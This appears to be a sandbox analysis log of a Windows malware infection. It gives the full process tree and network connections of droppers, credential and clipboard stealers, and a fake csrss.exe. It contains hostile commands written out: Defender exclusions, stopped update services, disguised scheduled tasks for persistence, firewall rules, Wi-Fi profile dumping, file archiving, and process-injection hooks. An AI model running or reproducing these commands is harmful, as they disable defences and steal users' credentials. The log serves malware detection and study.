"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5560 -ip 5560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xa4,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "Utsysc.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\ea7c8244c8" /P "Admin:R" /E

C:\Windows\system32\tar.exe

tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\811856890180_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6684 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x53c 0x540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8796 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 254.20.238.8.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
NL 194.169.175.118:80 194.169.175.118 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 store.steampowered.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
BG 171.22.28.213:80 171.22.28.213 tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.193:443 twitter.com tcp
US 104.244.42.193:443 twitter.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 149.40.62.171:15666 tcp
US 8.8.8.8:53 193.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 static.ads-twitter.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
NL 199.232.148.159:443 pbs.twimg.com tcp
US 104.244.42.130:443 api.twitter.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 t.co udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 104.244.42.5:443 t.co tcp
NL 199.232.148.158:443 video.twimg.com tcp
US 8.8.8.8:53 analytics.twitter.com udp
US 8.8.8.8:53 171.62.40.149.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 159.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 130.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 5.42.244.104.in-addr.arpa udp
US 104.244.42.67:443 analytics.twitter.com tcp
US 104.244.42.67:443 analytics.twitter.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:443 api.ipify.org tcp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 67.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 212.62.237.104.in-addr.arpa udp
IT 185.196.9.171:80 185.196.9.171 tcp
US 8.8.8.8:53 171.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
JP 23.207.106.113:443 steamcommunity.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 194.49.94.11:80 194.49.94.11 tcp
US 8.8.8.8:53 169.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
NL 23.72.252.169:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 75.101.208.230:443 www.epicgames.com tcp
US 75.101.208.230:443 www.epicgames.com tcp
US 8.8.8.8:53 230.208.101.75.in-addr.arpa udp
US 185.196.8.176:80 185.196.8.176 tcp
US 185.196.8.176:80 185.196.8.176 tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 54.82.162.139:443 tracking.epicgames.com tcp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 130.47.239.18.in-addr.arpa udp
US 8.8.8.8:53 176.8.196.185.in-addr.arpa udp
US 8.8.8.8:53 22.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 139.162.82.54.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 i.ytimg.com udp
DE 172.217.23.214:443 i.ytimg.com tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 214.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 185.196.8.176:80 185.196.8.176 tcp
US 185.196.8.176:80 185.196.8.176 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
DE 172.217.23.214:443 i.ytimg.com udp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 i4.ytimg.com udp
DE 172.217.23.206:443 i4.ytimg.com tcp
